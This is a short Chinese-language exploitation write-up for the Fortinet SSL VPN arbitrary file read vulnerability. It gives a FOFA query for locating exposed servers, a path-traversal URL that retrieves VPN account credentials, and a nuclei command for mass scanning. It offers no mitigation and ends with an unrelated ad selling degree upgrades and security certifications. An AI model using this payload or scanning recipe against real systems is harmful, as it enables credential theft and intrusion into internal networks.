0x01 漏洞描述

Fortinet将其SSL VPN产品线称为Fortigate SSL VPN,主要应用于最终用户以及中型企业。目前互联网上这些服务器的数量已超过48万台,主要集中在亚洲及欧洲区域。FortinetSSL VPN系统存在任意文件读取漏洞，攻击者通过漏洞可以通过VPN进入内网，导致内网失陷。

0x02 漏洞复现

fofa：app="FORTINET-SSLVPN"

1.执行POC，得到VPN账号密码

/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession

2.根据账号密码登录即可（需要下载客户端）

3.nuclei验证脚本已经自带，如下

nuclei.exe -t /http/cves/2018/CVE-2018-13379.yaml -l subs.txt -stats

学历：非全日制的学历提升，高升专，专升本可学位

安全证书：cisp  cissp  cisp-pte 等

 有需要的私聊